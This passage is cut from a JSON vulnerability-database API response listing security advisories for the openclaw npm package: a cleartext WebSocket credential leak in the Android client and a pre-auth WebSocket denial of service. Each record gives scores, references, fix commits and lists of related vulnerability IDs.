                "GHSA-f6pf-4gjx-c94r"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-32zs-2zs9-uufs"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89946?format=api",
            "vulnerability_id": "VCID-356u-h788-pkgt",
            "summary": "OpenClaw: Android accepted cleartext remote gateway endpoints and sent stored credentials over ws://\n## Summary\n\nBefore OpenClaw 2026.4.2, Android accepted non-loopback cleartext `ws://` gateway endpoints and would send stored gateway credentials over that connection. Discovery beacons or setup codes could therefore steer the client onto a cleartext remote endpoint.\n\n## Impact\n\nA user who followed a forged discovery result or scanned a crafted setup code could disclose stored gateway credentials to an attacker-controlled endpoint in plaintext. This was a transport-security bug in the Android gateway client.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `>= 2026.4.2`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `a941a4fef9bc43b2973c92d0dcff5b8a426210c5` — require TLS for remote Android gateway endpoints\n\n## Release Process Note\n\nThe fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live.\n\nThanks @zsxsoft for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-40045",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6e-05",
                            "scoring_system": "epss",
                            "scoring_elements": "0.00423",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "6e-05",
                            "scoring_system": "epss",
                            "scoring_elements": "0.00428",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "6e-05",
                            "scoring_system": "epss",
                            "scoring_elements": "0.00427",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-40045"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/a941a4fef9bc43b2973c92d0dcff5b8a426210c5",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "5.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T13:37:33Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/a941a4fef9bc43b2973c92d0dcff5b8a426210c5"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-83f3-hh45-vfw9",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "5.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T13:37:33Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-83f3-hh45-vfw9"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40045",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40045"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-cleartext-credential-transmission-via-unencrypted-websocket-gateway-endpoints",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "5.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T13:37:33Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-cleartext-credential-transmission-via-unencrypted-websocket-gateway-endpoints"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-83f3-hh45-vfw9",
                    "reference_id": "GHSA-83f3-hh45-vfw9",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-83f3-hh45-vfw9"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109939?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.2",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2"
                }
            ],
            "aliases": [
                "CVE-2026-40045",
                "GHSA-83f3-hh45-vfw9"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-356u-h788-pkgt"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91523?format=api",
            "vulnerability_id": "VCID-37ep-9smd-zuh9",
            "summary": "OpenClaw: Gateway WebSocket Denial of Service via unbounded pre-auth upgrades\n## Summary\n\nThe gateway accepted unbounded concurrent unauthenticated WebSocket upgrades before allocating them to an authenticated session budget.\n\n## Impact\n\nAn unauthenticated network attacker could consume socket and worker capacity and disrupt WebSocket availability for legitimate clients.\n\n## Affected Component\n\n`src/gateway/server-http.ts, src/gateway/server/preauth-connection-budget.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `cb5f7e201f` (`gateway: cap concurrent pre-auth websocket upgrades`).\n\nDiscovered by: Topsec AlphaLab (wang dong)",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41399",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00102",
                            "scoring_system": "epss",
                            "scoring_elements": "0.27671",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00102",
                            "scoring_system": "epss",
                            "scoring_elements": "0.27584",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00102",
                            "scoring_system": "epss",
                            "scoring_elements": "0.27621",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41399"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/cb5f7e201f3f86ad70e199ef850e636b4cc457ba",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/cb5f7e201f3f86ad70e199ef850e636b4cc457ba"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-f44p-c7w9-7xr7",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-f44p-c7w9-7xr7"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41399",
                    "reference_id": "CVE-2026-41399",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41399"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-f44p-c7w9-7xr7",
                    "reference_id": "GHSA-f44p-c7w9-7xr7",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-f44p-c7w9-7xr7"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.28",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"
                }
            ],
            "aliases": [
                "CVE-2026-41399",
                "GHSA-f44p-c7w9-7xr7"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-37ep-9smd-zuh9"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90971?format=api",
            "vulnerability_id": "VCID-384t-z1h8-pfft",
